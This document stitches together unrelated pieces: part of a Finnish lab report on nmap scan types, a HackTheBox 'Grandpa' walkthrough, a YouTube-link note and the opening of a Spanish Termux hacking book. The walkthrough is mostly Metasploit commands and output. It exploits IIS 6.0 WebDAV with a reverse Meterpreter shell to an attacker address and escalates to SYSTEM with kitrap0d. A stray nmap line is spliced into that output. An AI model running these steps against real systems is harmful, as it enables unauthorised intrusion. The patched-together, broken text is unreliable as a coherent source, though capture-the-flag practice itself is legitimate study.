<metasploitable osoite>`` raakana samalla, kun Wireshark loggasi pakettien kulkua portista jolla oli yhteys virtuaaliverkkoon. ![image](https://user-images.githubusercontent.com/94109769/202847449-218e2a88-78bc-4b33-9b5a-d3b0fedb6419.png) Tämä nmapin porttiskannauksen tulos oli jo aikaisemmasta harjoituksesta tuttu, mutta itselleni bongasi silmään rivi, jolla kerrottiin tulostuksesta jääneen pois 977 suljettua porttia. Avoimia portteja oli listattu 23, joten nopea matikka kertoi, että portteja olisi yhteensä skannattu 1000. Oletukseni tästä on, että tämä skannaustyyppi skannaa 1000 ennalta määriteltyä TCP-porttia, jotka oletettavasti ovat yleisimmin käytettyjä portteja palvelinympäristöillä. Wireshark taas kaappasi todella suuren määrän liikennettä: ![image](https://user-images.githubusercontent.com/94109769/202847613-7277e16c-60b7-402a-9d0c-df7157683c44.png) Rivejä oli päälle kaksi tuhatta, ja tätä oli oikein vaikea tulkita puhtaasti, koska nmap selvästi oli lähettänyt niin monelle portille yhtäaikaisesti paketteja, että vastauksiakaan ei ehtinyt tulemaan takaisin maalikoneesta heti. Nappasin alkupäästä ainakin yhden portin, jota ei selvästikkään ollut tullut nmapin tulosteeseen, ja filtteröin tulosteen sen perusteella, jotta voin tarkemmin tutkia, mitä sen kanssa oli käynyt. ![image](https://user-images.githubusercontent.com/94109769/202847694-33132be3-0bb6-48fb-916e-277e8d8fe63a.png) Portille 256 oli lähetetty siis SYN paketti, jolla yritettiin luoda avointa yhteyttä kohteelle tämän portin kautta. Vastauksena maalikone olikin lähettänyt suoraan RST (eli RESET) paketin, joka katkaisi yhteyden suoraan. Tämä indikoi siis, että kohde ei hyväksy enempää liikennettä/dataa tästä portista, joten voimme päätellä, että portti todennäköisesti on kiinni. Vastaavasti filtteröin seuraavaksi wiresharkin näyttämään kaapatut paketit portilta 111, joka oli päässyt nmapin tulosteeseen: ![image](https://user-images.githubusercontent.com/94109769/202847790-71ad6a68-5762-45d4-a1bc-9005bd21b44d.png) Täällähän tapahtuikin enemmän. SYN -paketin vastaanotettuaan portilta 111, maalikone lähettekin takaisin SYN, ACK -paketin. Eli toisensanoan se hyväksyi vastaanotetun SYN -paketin, ja lähetti samanlaisen takaisin avatakseen molemminpuolisen yhteyden. Tämän paketin saatuaan Kali kone hyväksyi sen ensin, mutta sen jälkeen lähetti heti RST -paketin maalikoneelle katkaistakseen yhteyden. Eli lyhykäisyydessään voi sanoa, että tämä nmap skannaus yrittyi luoda yhteyksiä tuhannen eri portin kautta, ja kirjasi ylös ne portit, joilla yhteydenotto onnistui. ### nmap TCP SYN "Stealth" scan (-sS) SYN -skannaus mainittiinkin jo nmap reference guidessa edellistä skannaustyyppiä tutkiessa. Tämän skannaustyypin olisi siis tarkoitus olla vaikeammin huomattava ja tehokkaampi Connect -skanniin verrattuna. Se vaatii myös raaka-pakettien oikeudet, joten tämä ei onnistuisi ilman sudotusta. Kokeilin tätä heti komennolla ``sudo nmap -sS <metasploitable osoite>``. Nmapin tuloste oli täysin sama kuin -sT komennollakin. Wiresharkissa 256 portilla näkyi myös täsmälleen sama liikenne (SYN paketti portille 256, RST paketti samantien takaisin koska se oli kiinni), mutta portin 111 kohdalla näkyi eroa: ![image](https://user-images.githubusercontent.com/94109769/202848264-6ac6d869-5717-42ba-b73b-8fa3c24c632b.png) Maalikone lähetti jälleen SYN, ACK -viestin takaisin Kali koneelle, mutta tällä kertaa Kali samantien lähetti RST viestin, estääkseen yhteyden loppuunmuodostamisen. ### Ping Sweep (-sn) Nopea silmäily jälleen [nmap reference guidin puolella](https://nmap.org/book/man-host-discovery.html) kertoi -sn parametrin vain skannavaan vastaavia verkkolaitteita ilman porttiskannauksia. Tätä on hyvä hyödyntää pelkästään selvittämään kuinka monta muuta laitetta verkossa on. Tässä tapauksessa käytin komentoa ``sudo nmap -sn <skannattava verkkoavaruus>``. Sen sijaan, että olisin nyt antanut suoraan metasplotablen ip-osoitteen, lähden skenaariolla liikkelle, jossa vielä ei tiedetä mitä muita koneita verkosta löytyy. Eli tämän sijaan käytinkin verkkotunnistetta ``192.162.60.0/24``, joka käytännössä tulee määrittelemään, että nmap tekee host-discoveryn ip-osoittellee haarukalla 192.162.60.0 - 192.162.60.255. ![image](https://user-images.githubusercontent.com/94109769/202848698-2f8e6d21-7dbf-433a-90d9-acb88574fc62.png) Jos verkolle olisi määritelty nimipalvelin, oltaisiin tällä koneella saatu Reverse-DNS kyselyllä selville myös koneiden nimeet. Tässä tapauksessa meille riittää nyt kuitenkin nämä tiedot. .1 päättyinen ip osoite on todennäköisimmin verkon gateway, .3 on oma osoite, ja .4 on maalikone. En ole ihan varma mikä .2 tässä on, mutta koska sen MAC osoite vastaa Virtualboxin virtuaalista verkkoadapteria, ehkä se on jokin ylijäämä virtuaaliverkossa? ![image](https://user-images.githubusercontent.com/94109769/202848853-43cc32e9-76b2-4863-be67-e453c4c716cf.png) Wiresharkista nähdään, mitä nmap käytännössä siis teki. Se lähetti ARP kyselyviestejä järjestyksessjä jokaisesta mahdollisesta osoitteesta määritellystä verkkoavaruudesta. Ja koska ARP-viestit ovat broadcast-viestejä, kaikki muut laitteet havaitsevat sen vaikkei niitä ole määritelty erikseen vastaanottajaksi. Nmap kirjasi ylös siis ne ip-osoitteet, joista saatiin vastaus. ### Don't Ping (-Pn) Reference Guide:n sama sivu kertoi -Pn parametrista sen, että sitä käytetään host discovery:n ohittamiseen, ja tällä parametrilla nmap tekee porttiskannaukset jokaiselle laitteelle verkossa joka tapauksessa sillä oletuksella, että ne olisivat ylhäällä. Nopea testaus ja reference guide:n oma huomautuskin tosin paljasti, että ARP-kysely tehdään paikallisella verkolla joka tapauksessa, koska nmap tarvitsee vastaanottavien porttien MAC-osoitteet. Tämä todennäköisesti olisi tarkoitus ohittaa ICMP-viestien lähettäminen kokonaan, mutta en wiresharkin tulosteissa ollut nähnyt ICMP-viestejä aikaisemmissakaan komennoissa, joten itselleni jäi kuitenkin mysteeriksi, mikä tämän käyttötarkoitus olisi. Ehkä ping-viestien lähettämisen ohitus ulkoisia verkkoja skannatessa? En ihan kehdannut sitä kuitenkaan labrata, koska itseltäni ei löytynyt ympäristöä joka sallisi sen laillisissa puitteissa. ### Version detection (-sV) -sV parametrilla otetaan käyttöön nmapilla versionhavainnointi. Normaalissa nmapin tulosteessa nmap osaa jo kertoa suurinpiirtein [nmap reference guide:n](https://nmap.org/book/man-version-detection.html) mukaan perustuen tietokantaan jota se referoi, mihin näitä avoimia portteja todennäköisimmin käytetään. Esimerkiksi portti 22 merkataan ssh -protokollan alle, koska se on oletusportti SSH-yhteyksille. Pelkästään näillä tiedoilla ei tietenkään saa selville mitä ohjelmistoja portin takana todennäköisesti pyörii. Parametrin -sV kanssa nmap alkaa pommittamaan avoimia portteja porttiskannauksen jälkeen paketeilla ja kyselyillä, joilla se hakee vielä suurempaan tietokantaan perustuen tietoja, koittaen sovittaa kohteelta saamia vastauksia tietokanansta löytyviin tietoihin ja tätne lopulta päättelemään ohjelmiston ja sen version, joka portin takana on. Testatin tätä ajamalla komennon ``sudo nmap -sV <metasploitablen IP>`` ja tarkistelemalla Wiresharkin kaappaamia paketteja filtteröitynä paketteihin, jotka ovat kulkeneet portin 8180 kautta. Metasploitablella porttin 8180 takana tunnistettiin pyörivän Apache Tomcat/Coyote JSP engine 1.1 palvelin, joten halusin koittaa tarkistella, mitä liikennettä portin lävitse on kulkenut jonka perusteella nmap oli tullut tähän johtopäätökseen. ![image](https://user-images.githubusercontent.com/94109769/202866547-4a15b1ad-c1d3-4f45-a429-f8350200c57a.png) Paketteja oli kymmenittäin. Sen verran, ettei niitä tässä tapauksessa saada millään järkevästi näkymään kuvakaappauksissa siististi. Pakettien silmäily ei sinänsä valottanut asiaa itsellenikään kauhean paljon. Liikenteestä löytyy paljon toistettuja yhteyden avauksia ja sulkuja ilman erityisempää liikennettä niiden välissä, eikä näiden pakettien tarkempi tutkiminen tuonut ainakaan itselleni mitään ymmärrystä, koska niistä ei löydy oikeastaan mitään selkotekstinä. Ainoa arvaukseni on, että nmap oli kokeillut, millaisilla vastauspaketeilla portti reagoi tiettyihin koodinpätkiin tai vastaavaa? Muutaman yhteysyrityksen jälkeen nmap oli alkanut lähettämään erilaisia HTTP paketteja. ![image](https://user-images.githubusercontent.com/94109769/202866668-37662fcb-67ee-4403-8a10-19eb73a8d341.png) Tämä esimerkkinä yhdestä paketista, jota nmap oli lähettänyt. En ymmärrä http-protokollankaan toimintaa niin syvällisesti, että kunnolla ymmärtäisin mitä se tarkalleen ottaen oli tällä GET -pyynnöllä koittanut saada, tai miten tämän odotettiin reagoivan. Pakettien määrästä ja erilaisuudesta jopa pelkästään HTTP-pakettien sisällä voinen tosin olettaa, että jotain järjestelmällistä testausta kaiken taustalla kuitenkin tapahtui. ### Porttivalinta Nmapille voi myös määritellä täsmälleen mitä portteja se skannaa. Parametrilla -p<x>-<y> se skannaa portit tietyllä haarukkavälillä. Esimerkiksi -p1-100 skannaisi portit ykkösestä sataan. Parametrilla --top-ports taas testauksen perusteella skannaa järjestyksessä kaikkein yleisiimmät portit; esimerkiksi --top-ports 5 parametrilla se skannaa viisi yleisintä porttia (jotka muuten ovat 21, 22, 23, 80 ja 443). Mahdollisuutena on myös parametri -p-, jota testasin myös itse. Nmapin tulostus ilmoitti löytäneensä avoimien portiten lisäksi 65505 suljettua porttia, sekä muutaman avoimen portin jota perusskannilla ei löytynyt, eli ilmeisimmin tämä skannaa **kaikki** mahdolliset portit, eikä pelkästään 10000 yleistä tunnettua porttia. ### Osoitevalinta Osoitteitakin voi määritellä kohteeksi usealla tavalla. AIkaisemmin olin käyttänyt pelkästään perus yhtä IP-osoitetta, mutta yksittäisiä ip-osoitteita voi listata pelkästään välimerkkiä käyttämällä erottajana. Olin jo käyttänyt myös verkkoavaruuden määritelmää formaatilla x.x.x.x/x, jossa kauttaviivan jälkeinen merkki määrittelee verkkomaskin suuruuden biteillä. Tähän kannattaa käyttää jotain aputyökalua jos meinaa skannatta osoitavaruuksia muiden kuin kahdeksalla jaollisten maskien kanssa, sillä ne eivät enää jaa osoitteita siististi oktettien mukaan. Lisäksi löytyy myös manuaalisesti määriteltävä haarukka yhden aliverkon alla, esimerkiksi 192.169.0.1-25. ### Output files ### Ajonaikaiset toiminnot ### Nmap sudolla ja ilman sudoa Testasin tässä, miten puhdas nmap komennon ajo eroaa ilman sudotusta, ja sudotuksen kanssa. Testaamalla ensin ilman sudotusta, wireshark näytti samanlaisen liikenteen tuloksen kuin ensimmäinen TCP Connect skannaus jota tein alussa -- eli se loi yhteyksenaloituksen maalikoneen kanssa, maalikone lähetti takaisin ACK paketin ja oman SYN paketin molemminpuolisen yhteyden aloittamiseen, oma kone lähetti tästä ACK paketin ja sen jälkeen RST paketin yhteyden sulkemiseen. Sudotuksen kanssa wiresharkista näkyi sama tulos kuin aikaisemmalla SYN -skannilla. Eli avoin portti lähetti taaskin SYN, ACK -paketin, mutta sen sijaan että oma kone olisi vastannut sille ACK paketilla, se saman tien lähetti RST paketin ennen kuin yhteys tuli avattua loppuun. Eli toisin sanoen nmap ajaa ilman sudoa oletus-skannina TCP Connect skannin, eli saman kuin käyttäisi parametria -sT, ja sudolla SYN skannin, eli saman kuin käyttäisi parametria -sS. ### -A Tehtävänä annettiin myös testata nmap komentoa -A -parametrilla, ja testata sen eroavaisuutta ajaa ilman sitä. Testasin tätä taas metasploitableen, ja huomasin heti, että sillä kesti hirveästi pidempään kuin ilman (ilman meni alle sekunti, -A:n kannsa joutui odottamaan ehkä 15s). Huomasin samalla Wiresharkista, että siellä liikkui vanka kuinka paljoin erinäisten protokollien paketteja; epäilykseni olisi että se heitti samoja paketteja mitä se käyttäisi version-havaoinnoinnissakin. Kalin komentorivillä tuloste oli myös aika verboosi: ![image](https://user-images.githubusercontent.com/94109769/202867755-bd74992c-556b-4cbe-bf74-ecb3ab6c6df7.png) Tämä osasi siis kertoa palvelun/ohjelman version ja mallin lisäksi useita yksityiskohtaisia tietoja-- jopa smtp -palvelun käyttämää sertifikaattia ja kuinka kauan se on voimassa! Yritin etsiä netistä tietoa siitä, mitä -A parametri oikeasti tekee, mutta en löytänyt jostain syystä suoraa vastausta pelkästään googlettamalla. Tämän datan määrän perusteella tosin arvaisin, että tämä parametri sai nmapin ajaamaan kaikki mahdolliset havainnointitoiminnot, mitä siltä löytyy. ## Lähteet [Kurssisivun tehtävänanto](https://terokarvinen.com/2022/tunkeutumistestaus-ict4tn027-3010-syksylla-2022/#h4-intelligence-cap) [Nmap Reference Guide](https://nmap.org/book/toc.html)
# Grandpa URL: https://app.hackthebox.com/machines/Grandpa Level: Easy Date 7 Jun 2020 ## Walkthrough - [Enumeration](#enumeration) - [Privesc](#privesc) # Enumeration ## NMAP ``` PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH | http-ntlm-info: | Target_Name: GRANPA | NetBIOS_Domain_Name: GRANPA | NetBIOS_Computer_Name: GRANPA | DNS_Domain_Name: granpa | DNS_Computer_Name: granpa |_ Product_Version: 5.2.3790 |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | WebDAV type: Unknown | Server Type: Microsoft-IIS/6.0 | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK |_ Server Date: Sun, 07 Jun 2020 17:40:37 GMT Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose ``` We do a google search "exploit Microsoft IIS httpd 6.0" and we found: https://www.exploit-db.com/exploits/41738 We run `msfconsole`: ``` use ScStoragePathFromUrl msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14 RHOSTS => 10.10.10.14 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.36 LHOST => 10.10.14.36 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444 LPORT => 4444 # Nmap 7.91 scan initiated Sat Apr 3 11:13:46 2021 as: nmap -Pn -p- -T4 -oN nmap.txt 10.10.10.5 it(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute force Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.14 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.36 yes The listen address (an interface may be specified) LPORT 5000 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 ``` We run it and we get shell: ``` msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run [*] Started reverse TCP handler on 10.10.14.36:5000 [*] Trying path length 3 to 60 ... [*] Sending stage (176195 bytes) to 10.10.10.14 [*] Meterpreter session 1 opened (10.10.14.36:5000 -> 10.10.10.14:1031) at 2020-07-01 23:02:13 +0200 ``` Our privilege right now is: ``` meterpreter > getuid [-] stdapi_sys_config_getuid: Operation failed: Access is denied. meterpreter > sysinfo Computer : GRANPA OS : Windows .NET Server (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 2 Meterpreter : x86/windows meterpreter > ``` # Privesc We look for processes: ``` meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 608 396 svchost.exe 680 396 svchost.exe 736 396 svchost.exe 764 396 svchost.exe 800 396 svchost.exe 820 3288 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 936 396 spoolsv.exe 964 396 msdtc.exe 1076 396 cisvc.exe 1116 396 svchost.exe 1176 396 inetinfo.exe 1216 396 svchost.exe 1328 396 VGAuthService.exe 1408 396 vmtoolsd.exe 1456 396 svchost.exe 1596 396 svchost.exe 1700 396 alg.exe 1828 608 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe ``` We notice `1828` running as `NT AUTHORITY\NETWORK SERVICE` and we try to migrate on it: ``` meterpreter > migrate 1828 [*] Migrating from 820 to 1828... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE ``` We use suggester: ``` meterpreter > background [*] Backgrounding session 1... msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0 msf5 post(multi/recon/local_exploit_suggester) > options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf5 post(multi/recon/local_exploit_suggester) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ GRANPA 10.10.14.36:5000 -> 10.10.10.14:1031 (10.10.10.14) msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. ``` We try MS10-015 (kitrap0d): ``` msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d msf5 exploit(windows/local/ms10_015_kitrap0d) > options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.0.2.15 yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1 session => 1 msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0 LHOST => tun0 msf5 exploit(windows/local/ms10_015_kitrap0d) > options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 8443 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4444 LPORT => 4444 ``` We run it and we get System shell: ``` msf5 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 10.10.14.36:4444 [*] Launching notepad to host the exploit... [+] Process 2320 launched. [*] Reflectively injecting the exploit DLL into 2320... [*] Injecting exploit into 2320 ... [*] Exploit injected. Injecting payload into 2320... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.10.10.14 [*] Command shell session 2 opened (10.10.14.36:4444 -> 10.10.10.14:1062) at 2020-07-01 23:13:07 +0200 12 C:\WINDOWS\system32>>whoami whoami nt authority\system ```
Writeups for this box is not available but there is a video walkthrough of this challenge in my Youtube Channel. [Link to this Youtube Video](https://www.youtube.com/watch?v=hKk9HnCwHMY).
![Portada Libro](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/portada.png) ----- ### Languages ##### ESP Este libro está escrito originalmente en español. Puedes acceder en otros lenguajes usando el traductor de Google, si bien no es perfecto puede ser de utilidad. ##### EN This book is original writen in spanish. You can access it in other languages too using google translator. Even if not perfect may be usefull. [English Translation](https://stringmanolo-github-io.translate.goog/hackingTermux101/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#tabla-de-contenidos) ### Tabla de Contenidos * [Prefacio](#prefacio) * [Capítulo 0: Requisitos y Programas Extra](#cap%C3%ADtulo-0-requisitos-y-programas-extra) * [Capítulo 1: Qué es Termux?](#cap%C3%ADtulo-1-qu%C3%A9-es-termux) * [Capitulo 2: Descarga e Instalación](#capitulo-2-descarga-e-instalaci%C3%B3n) * [Capítulo 3: Configuración Básica](#cap%C3%ADtulo-3-configuraci%C3%B3n-b%C3%A1sica) * [Capítulo 4: Uso básico de la terminal](#cap%C3%ADtulo-4-uso-b%C3%A1sico-de-la-terminal) * [Capítulo 5: Introducción a Bash](#cap%C3%ADtulo-5-introducci%C3%B3n-a-bash) * [Capítulo 6: Uso de VI y de VIM](#cap%C3%ADtulo-6-uso-de-vi-y-de-vim) * [Capitulo 7: Configuración de Bash](#capitulo-7-configuraci%C3%B3n-de-bash) * [Capítulo 8: Sistema de Ficheros](#cap%C3%ADtulo-8-sistema-de-ficheros) * [Capítulo 9: Creando comandos](#cap%C3%ADtulo-9-creando-comandos) * [Capítulo 10: Comandos Intermedios](#cap%C3%ADtulo-10-comandos-intermedios) * [Capítulo 11: Proot-Distro](#cap%C3%ADtulo-11-proot-distro) * [Capitulo 12: Introducción a Sistemas Linux](#capitulo-12-introducci%C3%B3n-a-sistemas-linux) * [Capitulo 13: Uso básico de Debian](#capitulo-13-uso-b%C3%A1sico-de-debian) * [Capítulo 14: Uso básico de Ubuntu](#cap%C3%ADtulo-14-uso-b%C3%A1sico-de-ubuntu) * [Capítulo 15: Uso básico de Alpine](#cap%C3%ADtulo-15-uso-b%C3%A1sico-de-alpine) * [Capítulo 16: Uso básico de Fedora](#cap%C3%ADtulo-16-uso-b%C3%A1sico-de-fedora) * [Capítulo 17: Introducción a Servicios](#cap%C3%ADtulo-17-introducci%C3%B3n-a-servicios) * [Capítulo 18: Creando un Servidor](#cap%C3%ADtulo-18-creando-un-servidor) * [Capítulo 19: Ngrok y Exponer Servicios](#cap%C3%ADtulo-19-ngrok-y-exponer-servicios) * [Capítulo 20: Tor, Configuración y Uso](#cap%C3%ADtulo-20-tor-configuraci%C3%B3n-y-uso) * [Capítulo 21: Servicios Ocultos](#cap%C3%ADtulo-21-servicios-ocultos) * [Capítulo 22: SSH, SCP y SSHD](#cap%C3%ADtulo-22-ssh-scp-y-sshd) * [Capítulo 23: Bots de Telegram](#cap%C3%ADtulo-23-bots-de-telegram) * [Capítulo 24: Telegram RAT](#cap%C3%ADtulo-24-telegram-rat) * [Capítulo 25: Protocolo HTTP](#cap%C3%ADtulo-25-protocolo-http) * [Capítulo 26: Protocolo DNS](#cap%C3%ADtulo-26-protocolo-dns) * [Capítulo 27: Servicios Web](#cap%C3%ADtulo-27-servicios-web) * [Capítulo 28: Hosting Gratuitos](#cap%C3%ADtulo-28-hosting-gratuitos) * [Capítulo 29: Dominios Gratuitos](#cap%C3%ADtulo-29-dominios-gratuitos) * [Capítulo 30: Introducción a Programación](#cap%C3%ADtulo-30-introducci%C3%B3n-a-programaci%C3%B3n) * Capítulo 31: Comparación de Lenguajes * Capitulo 32: Introducción a C * Capìtulo 33: Introducción a C++ * Capítulo 34: Introducción a C# * Capítulo 35: Introducción a Go * Capítulo 36: Introducción a Java * Capítulo 37: Introducción a Javascript * Capítulo 38: Introducción a Lua * Capítulo 39: Introducción a PHP * Capítulo 40: Introducción a Python * Capítulo 41: Introducción a Rust * Capítulo 42: Introducción a Node * Capítulo 43: Introducción a Typescript * Capítulo 44: Introducción a la Criptografìa * Capítulo 45: Introducción al Malware * Capítulo 46: Desarrollo de RATs * Capítulo 47: Desarrollo de Ransomwares * Capítulo 48: Desarrollo de Greyware * Capítulo 49: Introducción a Hacking * Capítulo 50: Introducción a OSINT * Capitulo 51: Google Hacking (dorks) * Capitulo 52: Introducción a Hacking Web * Capítulo 53: Introducción a Ingeniería Social * Capítulo 54: Laboratorios y Páginas de Hacking legal. * Capìtulo 55: HTMLi (inyección de HTML) * Capítulo 56: XSS (Inyección de Javascript) * Capítulo 57: CSFR (Peticiones entre sitios) * Capítulo 58: Clickjacking (secuestro de clicks) * Capítulo 59: HPP (Polución de parámetros HTTP) * Capítulo 60: Open Redirects (redirecciones abiertas) * Capitulo 61: SSRF (falsificación de peticiones en el lado del servidor) * Capítulo 62: Path Traversal (recorrer rutas) * Capítulo 63: Referrer Leaks (Filtraciones del referido) * Capítulo 64: Dangling HTML (HTML pendiente) * Capítulo 65: Subdomain/Domain Takeover (secuestro de sub/dominios) * Capítulo 66: Template Injection (Inyección de plantillas) * Capítulo 67: IDOR (Referencia a objecto indirecta) * Capítulo 68: SQLi (Inyección del lenguaje de consultas estructurado) * Capítulo 69: Cookie Tossing (lanzamiento de cookies) * Capítulo 70: Web Cache Poisoning (envenenamiento de la caché web) * Capítulo 71: Malas prácticas * Capítulo 72: Post Explotación * Capítulo 73: Herramientas de Hacking * Capítulo 74: Dig * Capítulo 75: Dirstalk * Capítulo 76: Impulse * Capítulo 77: ncat * Capítulo 78: nmap * Capítulo 79: nuclei * Capítulo 80: searchsploit * Capítulo 81: shodan * Capítulo 82: sqlmap * Capítulo 83: turbolist3r * Capítulo 84: C++ intermedio * Capítulo 85: Go intermedio * Capítulo 86: Javascript intermedio * Capítulo 87: PHP intermedio * Capítulo 88: Python intermedio * Capítulo 89: Node intermedio * Capítulo 90: Quickjs intermedio * Capítulo 91: Typescript intermedio * Capítulo 92: Criptografía intermedio * Capítulo 93: Malware intermedio * Capítulo 94: Ingeniería Social intermedio * Capítulo 95: Creando laboratorios y aplicaciones vulnerables * Capítulo 96: Desarrollando aplicaciones de hacking * Capítulo 97: Retos nivel basico * Capítulo 98: Retos nivel intermedio * Capítulo 99: Retos nivel avanzado * Capítulo 100: Retos nivel 3l1t3 * Glosario * Apéndice ----- ## Prefacio Bienvenido a la primera edición del libro Termux Hacking 101. Aquí vas a aprender a instalar Termux en Android, su uso básico, virus, programación y hacking. Termux es un emulador de terminal para Android y un entorno de Linux que funciona directamente sin necesidad de rootear el dispositivo o configurarlo. Un sistema base mínimo se instala automáticamente - Y muchos paquetes adicionales están disponibles desde su gestor de paquetes. Un pequeño inciso antes de comenzar. Este libro es 100% gratuito y se financia a través e donaciones. Si quieres contribuir a la creación de este libro, puedes realizar una tranferencia a la cuenta ```ES59 2080 5029 1630 0011 2266``` indicando como motivo de la transferencia "Libro Termux". Por donaciones de 20$ o más, se ofrece un día de clases particulares por Telegram. Indica tu nombre de Telegram en el asunto de la tranferencia. DONAR ES OPCIONAL, puedes leer el libro aunque no dones. Por qué deberías donar entonces? Si obtengo múltiples donaciones, me animará a seguir escribiendo el libro o a sacar nuevos libros. **Disfrútalo!** [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 0: Requisitos y Programas Extra Para poder utilizar Termux, necesitas un dispositivo Android. Termux soporta versiones de **android** comprendidas **entre** la **versión 7 y** la **última version** de Android. Necesitas un **mínimo** de **300 megas de espacio** en disco. Yo te **recomiendo** como **mínimo 8 gigas disponibles de memoria interna**. 64 Gigas está genial y suele ser mas que suficiente, depende del uso que le des. Antes de empezar, algunos programas extra son recomendados, aunque no necesarios. * [Hackers Keyboard](https://github.com/klausw/hackerskeyboard/releases/download/1.40.7/hackerskeyboard-v1.40.7.apk) Este sencillo teclado offline funciona de marabilla en la mayoría de dispositivos. No vende tus datos, ya que no se conecta nunca a internet y te ofrece un teclado como el del PC, aunque no es necesario. Yo no utilizo esta característica en concreto, pero si este es el único teclado que utilizo en Android por seguridad. Los que vienen preinstalados suelen vender tus datos aunque los configures para que no lo hagan. * [Fx File Explorer](https://play.google.com/store/apps/details?id=nextapp.fx) Explorador de ficheros para Android que te permite el acceso a las carpetas de Termux. No lo he probado pero es recomendado por los desarrolladores de Termux. [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 1: Qué es Termux? Termux es una aplicación para Android de código abierto que trae todo el poder Linux a tu dispositivo móvil. Puedes realizar prácticamente cualquier tarea que realices en tu PC con un Linux instalado. Todo se realiza directamente desde la terminal escribiendo comandos, aunque también es posible [instalar](https://wiki.termux.com/wiki/Graphical_Environment) un entorno gráfico como X11. Termux instala por defecto un sistema base con comandos y paquetes comunes que suelen ser imprescindibles en cualquier 